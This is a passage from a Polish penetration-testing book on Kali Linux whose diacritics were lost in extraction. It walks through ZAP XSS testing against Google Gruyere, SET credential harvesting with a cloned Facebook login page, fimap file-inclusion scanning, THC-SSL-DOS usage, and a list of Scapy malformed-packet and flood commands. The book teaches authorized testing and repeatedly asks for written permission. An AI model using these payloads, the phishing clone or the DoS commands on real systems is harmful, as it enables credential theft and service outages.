OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

